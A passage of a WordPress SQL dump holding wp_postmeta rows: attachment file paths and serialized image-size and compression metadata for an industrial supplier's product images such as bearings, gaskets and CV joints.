INSERT INTO `wp_postmeta` VALUES (105, 61, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:590;s:6:"height";i:250;s:4:"file";s:16:"2016/08/suit.jpg";s:5:"sizes";a:5:{s:9:"thumbnail";a:4:{s:4:"file";s:16:"suit-340x250.jpg";s:5:"width";i:340;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:16:"suit-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:16:"suit-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:16:"suit-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:16:"suit-510x250.jpg";s:5:"width";i:510;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"3";s:8:"quantity";d:100;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (106, 62, '_wp_attached_file', '2016/08/tubs.jpg'); 
INSERT INTO `wp_postmeta` VALUES (107, 62, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:220;s:6:"height";i:179;s:4:"file";s:16:"2016/08/tubs.jpg";s:5:"sizes";a:1:{s:14:"shop_thumbnail";a:4:{s:4:"file";s:16:"tubs-200x179.jpg";s:5:"width";i:200;s:6:"height";i:179;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"1";s:8:"quantity";d:100;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (108, 63, '_wp_attached_file', '2016/08/woman.jpg'); 
INSERT INTO `wp_postmeta` VALUES (109, 63, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:250;s:6:"height";i:258;s:4:"file";s:17:"2016/08/woman.jpg";s:5:"sizes";a:3:{s:25:"display_product_thumbnail";a:4:{s:4:"file";s:17:"woman-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:17:"woman-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:17:"woman-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"3";s:8:"quantity";d:100;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (110, 50, '_wp_attachment_backup_sizes', 'a:1:{s:9:"full-orig";a:3:{s:5:"width";i:167;s:6:"height";i:91;s:4:"file";s:12:"mslogo-1.png";}}'); 
INSERT INTO `wp_postmeta` VALUES (111, 64, '_edit_last', '3'); 
INSERT INTO `wp_postmeta` VALUES (112, 64, '_edit_lock', '1497554614:3'); 
INSERT INTO `wp_postmeta` VALUES (113, 64, '_wp_page_template', 'default'); 
INSERT INTO `wp_postmeta` VALUES (114, 75, '_wp_attached_file', '2016/08/Aerospace-1.jpg'); 
INSERT INTO `wp_postmeta` VALUES (115, 75, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:3000;s:6:"height";i:2000;s:4:"file";s:23:"2016/08/Aerospace-1.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:23:"Aerospace-1-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:23:"Aerospace-1-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:23:"Aerospace-1-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:25:"Aerospace-1-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:23:"Aerospace-1-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:23:"Aerospace-1-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:23:"Aerospace-1-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:23:"Aerospace-1-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:2:"-2";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (116, 76, '_wp_attached_file', '2016/08/Automotive-1.jpg'); 
INSERT INTO `wp_postmeta` VALUES (117, 76, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:2400;s:6:"height";i:1800;s:4:"file";s:24:"2016/08/Automotive-1.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:24:"Automotive-1-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:24:"Automotive-1-800x600.jpg";s:5:"width";i:800;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:24:"Automotive-1-768x576.jpg";s:5:"width";i:768;s:6:"height";i:576;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:26:"Automotive-1-1600x1200.jpg";s:5:"width";i:1600;s:6:"height";i:1200;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:24:"Automotive-1-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:24:"Automotive-1-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:24:"Automotive-1-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:24:"Automotive-1-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"3";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (118, 77, '_wp_attached_file', '2016/08/Bearings-1-1.jpg'); 
INSERT INTO `wp_postmeta` VALUES (119, 77, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:3888;s:6:"height";i:2592;s:4:"file";s:24:"2016/08/Bearings-1-1.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:24:"Bearings-1-1-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:24:"Bearings-1-1-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:24:"Bearings-1-1-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:26:"Bearings-1-1-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:24:"Bearings-1-1-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:24:"Bearings-1-1-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:24:"Bearings-1-1-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:24:"Bearings-1-1-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"2";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (120, 78, '_wp_attached_file', '2016/08/Bearings-5.jpg'); 
INSERT INTO `wp_postmeta` VALUES (121, 78, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5155;s:6:"height";i:3497;s:4:"file";s:22:"2016/08/Bearings-5.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:22:"Bearings-5-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:22:"Bearings-5-800x543.jpg";s:5:"width";i:800;s:6:"height";i:543;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:22:"Bearings-5-768x521.jpg";s:5:"width";i:768;s:6:"height";i:521;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:24:"Bearings-5-1600x1085.jpg";s:5:"width";i:1600;s:6:"height";i:1085;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:22:"Bearings-5-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:22:"Bearings-5-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:22:"Bearings-5-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:22:"Bearings-5-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"3";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (122, 79, '_wp_attached_file', '2016/08/Conformal-1.jpg'); 
INSERT INTO `wp_postmeta` VALUES (123, 79, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:450;s:6:"height";i:318;s:4:"file";s:23:"2016/08/Conformal-1.jpg";s:5:"sizes";a:4:{s:9:"thumbnail";a:4:{s:4:"file";s:23:"Conformal-1-340x318.jpg";s:5:"width";i:340;s:6:"height";i:318;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:23:"Conformal-1-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:23:"Conformal-1-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:23:"Conformal-1-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"5";s:8:"quantity";d:100;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (124, 80, '_wp_attached_file', '2016/08/Conformal_Epoxy-1.jpg'); 
INSERT INTO `wp_postmeta` VALUES (125, 80, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:4928;s:6:"height";i:3264;s:4:"file";s:29:"2016/08/Conformal_Epoxy-1.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:29:"Conformal_Epoxy-1-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:29:"Conformal_Epoxy-1-800x530.jpg";s:5:"width";i:800;s:6:"height";i:530;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:29:"Conformal_Epoxy-1-768x509.jpg";s:5:"width";i:768;s:6:"height";i:509;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:31:"Conformal_Epoxy-1-1600x1060.jpg";s:5:"width";i:1600;s:6:"height";i:1060;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:29:"Conformal_Epoxy-1-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:29:"Conformal_Epoxy-1-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:29:"Conformal_Epoxy-1-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:29:"Conformal_Epoxy-1-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"2";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (126, 81, '_wp_attached_file', '2016/08/CV-joints-1.jpg'); 
INSERT INTO `wp_postmeta` VALUES (127, 81, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5481;s:6:"height";i:3396;s:4:"file";s:23:"2016/08/CV-joints-1.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:23:"CV-joints-1-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:23:"CV-joints-1-800x496.jpg";s:5:"width";i:800;s:6:"height";i:496;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:23:"CV-joints-1-768x476.jpg";s:5:"width";i:768;s:6:"height";i:476;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:24:"CV-joints-1-1600x991.jpg";s:5:"width";i:1600;s:6:"height";i:991;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:23:"CV-joints-1-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:23:"CV-joints-1-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:23:"CV-joints-1-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:23:"CV-joints-1-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"3";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (128, 82, '_wp_attached_file', '2016/08/gasket-1.jpg'); 
INSERT INTO `wp_postmeta` VALUES (129, 82, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:6016;s:6:"height";i:4016;s:4:"file";s:20:"2016/08/gasket-1.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:20:"gasket-1-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:20:"gasket-1-800x534.jpg";s:5:"width";i:800;s:6:"height";i:534;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:20:"gasket-1-768x513.jpg";s:5:"width";i:768;s:6:"height";i:513;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:22:"gasket-1-1600x1068.jpg";s:5:"width";i:1600;s:6:"height";i:1068;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:20:"gasket-1-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:20:"gasket-1-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:20:"gasket-1-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:20:"gasket-1-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"4";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (130, 83, '_wp_attached_file', '2016/08/logo-4.png'); 
INSERT INTO `wp_postmeta` VALUES (131, 83, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:167;s:6:"height";i:91;s:4:"file";s:18:"2016/08/logo-4.png";s:5:"sizes";a:0:{}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"0";s:8:"quantity";d:100;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (132, 84, '_wp_attached_file', '2016/08/logo_ms-1.png'); 
INSERT INTO `wp_postmeta` VALUES (133, 84, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:152;s:6:"height";i:83;s:4:"file";s:21:"2016/08/logo_ms-1.png";s:5:"sizes";a:0:{}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"2";s:8:"quantity";d:100;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (134, 85, '_wp_attached_file', '2016/08/MEdical-1-1.jpg'); 
INSERT INTO `wp_postmeta` VALUES (135, 85, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:450;s:6:"height";i:320;s:4:"file";s:23:"2016/08/MEdical-1-1.jpg";s:5:"sizes";a:4:{s:9:"thumbnail";a:4:{s:4:"file";s:23:"MEdical-1-1-340x320.jpg";s:5:"width";i:340;s:6:"height";i:320;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:23:"MEdical-1-1-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:23:"MEdical-1-1-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:23:"MEdical-1-1-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"4";s:8:"quantity";d:100;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (136, 86, '_wp_attached_file', '2016/08/release-agent.jpg'); 
INSERT INTO `wp_postmeta` VALUES (137, 86, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:7360;s:6:"height";i:4912;s:4:"file";s:25:"2016/08/release-agent.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:25:"release-agent-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:25:"release-agent-800x534.jpg";s:5:"width";i:800;s:6:"height";i:534;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:25:"release-agent-768x513.jpg";s:5:"width";i:768;s:6:"height";i:513;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:27:"release-agent-1600x1068.jpg";s:5:"width";i:1600;s:6:"height";i:1068;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:25:"release-agent-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:25:"release-agent-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:25:"release-agent-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:25:"release-agent-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"5";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (138, 87, '_wp_attached_file', '2016/08/Releasys.jpg'); 
INSERT INTO `wp_postmeta` VALUES (139, 87, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:4256;s:6:"height";i:2832;s:4:"file";s:20:"2016/08/Releasys.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:20:"Releasys-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:20:"Releasys-800x532.jpg";s:5:"width";i:800;s:6:"height";i:532;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:20:"Releasys-768x511.jpg";s:5:"width";i:768;s:6:"height";i:511;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:22:"Releasys-1600x1065.jpg";s:5:"width";i:1600;s:6:"height";i:1065;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:20:"Releasys-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:20:"Releasys-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:20:"Releasys-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:20:"Releasys-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"3";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
